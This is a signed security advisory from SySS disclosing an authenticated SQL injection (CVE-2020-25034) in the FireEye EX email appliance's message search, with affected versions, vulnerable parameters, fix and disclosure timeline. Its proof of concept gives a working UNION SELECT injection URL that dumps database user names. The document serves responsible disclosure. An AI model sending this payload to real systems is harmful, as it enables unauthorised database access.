-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512 Advisory ID: SYSS-2020-031 Product: FireEye EX 3500, eMPS Manufacturer: FireEye Affected Version(s): Versions prior to eMPS 9.0.1 Tested Version(s): eMPS 8.4.3.908134 Vulnerability Type: Improper Neutralization of Special Elements used in an SQL Command('SQL Injection')(CWE-89) Risk Level: Low Solution Status: Fixed Manufacturer Notification: 2020-07-28 Solution Date: 2020-09-29 Public Disclosure: 2020-10-26 CVE Reference: CVE-2020-25034 Author of Advisory: Dr. Benjamin Hess, SySS GmbH ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Overview: FireEye EX is an e-mail security appliance to detect and block unwanted e-mails. The appliance is primarily controlled via a web GUI. The manufacturer describes the product as follows (see [1]): "FireEye Email Security detects and blocks every kind of unwanted email, especially targeted advanced attacks. Time and again, this solution has proven itself capable of detecting corporate email threats in traffic accepted as safe by other products." Due to missing sanitization of user-controlled input, the web application is vulnerable to SQL injection allowing to extract data from the underlying database. The exploitation requires authorized access to the application, whereby low privileges are sufficient. Considering this aspect and the fact that such appliances are usually placed in separate networks with restricted access, the risk level is rated as "low". ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Vulnerability Details: The vulnerability can be triggered when logging onto the web GUI as an authenticated user and searching for processed e-mails. The vulnerability was successfully triggered with active sessions for the following roles: "monitor", "analyst", "operator", "admin". The role "auditor" does not have access to the e-mail search. Multiple SQL injection vectors were identified for different search para- meters like "sort", "sort_by", "search[URL]", and "search[attachment]", most of them involving time-based blind injection. The most powerful vector injects a UNION query via the "sort" parameter. The underlying database management system is Postgres and the queries are executed as the user "webui", which is not a database admin. Furthermore, stacked queries were not possible within testing time, so that the exploitation is limited to pure read access to the database. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Proof of Concept (PoC): Sending the following GET request using the cookies for an active session, say in the role "monitor", demonstrates the successful exploitation: https://targethost.com/ex/message_tracking/messages?sort=ASC')+UNION+ALL+SELECT+ NULL,usename,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL, NULL,NULL,NULL,NULL+FROM+pg_user--+foo&sort_by=1&offset=0&num=25&search%5Burl%5D =a&search%5Battachment%5D=a&job_id=1 The response contains JSON objects and has additional elements with the field "message_id" set to the names of the database users, one name per element. As mentioned in the previous section, other parameters are vulnerable as well. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Solution: Upgrade to version 9.0.1 or later. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Disclosure Timeline: 2020-07-24: Vulnerability discovered 2020-07-28: Vulnerability reported to manufacturer 2020-09-29: Patch released by manufacturer 2020-10-26: Public disclosure of vulnerability ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ References: [1] Product Website for FireEye Email Security https://www.fireeye.com/products/email-security.html [2] SySS Security Advisory SYSS-2020-031 https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/ SYSS-2020-031.txt [3] SySS Responsible Disclosure Policy https://www.syss.de/en/news/responsible-disclosure-policy/ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Credits: This security vulnerability was found by Dr. Benjamin Hess of SySS GmbH. E-Mail: benjamin.hess@syss.de Public Key: https://www.syss.de/fileadmin/dokumente/PGPKeys/Benjamin_Hess.asc Key ID: 0x1331325C Key Fingerprint: D73C 3C3D 746C 66C3 D0AE BED8 7FD5 638E 1331 325C ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Disclaimer: The information provided in this security advisory is provided "as is" and without warranty of any kind. Details of this security advisory may be updated in order to provide as accurate information as possible. The latest version of this security advisory is available on the SySS website. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Copyright: Creative Commons - Attribution (by) - Version 3.0 URL: http://creativecommons.org/licenses/by/3.0/deed.en -----BEGIN PGP SIGNATURE----- iQIzBAEBCgAdFiEE1zw8PXRsZsPQrr7Yf9VjjhMxMlwFAl+SfYgACgkQf9VjjhMx Mlx2eRAApL7g9/vPXaER8weQkI+blCtkrMRH74xR9ir+OcNzB8osJoA4iqUKVKta GhoO3+Alz/1THGPDkOhfMd6aOgn07IdA6ugUg+1ZTRxoV2AaqhjjJz0vow76tr8C KCqaQBGMFFF5LgcwjLdvwqk4/qM+A5b9hekztuQk7UPijGG07ZpejSim/OPqTM8i p/9Q6VM0WAPTN2+1reClLItj4wxuA31ge98JJoEix8EzFq6YDu6ibttn9fUcMXHY oKXK6a2oiW1g8lotXEw8RrGp0Wjm83MuozYYPmKgEOCAYU+c4KsgrNg2oGSp/vsK USoMjeVSdmOjxumRvoW1Yf5y4bOCfOiB8knnmr8sX1czTxKW2iF0MHX2kQIe+tGQ DCkQ3dWmZFeBzFXHwSjEOTBMDM8YDtL+LOvQQ6R9rAqEn76ebzhFO7TD3k/W3Zel 1xTuCTeE/SsjjkDWyBkxqaEMipk2SRVriMdjhvfu9NO5Dp5JFo40F1HbdLn3IrQJ HnY+bkB9SXU8LahpX9YihHoKbCnijq728vPSSg09NSKTJ87L5UiJyp0y5ICX9mjW uXpDfY3ydlsIXUzqZXkflqWTyOW+17ruQnVYNhGcyh41jqDFkPlN2lAo9MJr0rbQ Fxl0doPLFlXIe8NE1SPlV/9bkDZzR9iv2Pu6JznZI7JrpLgYrdo= =XLR4 -----END PGP SIGNATURE-----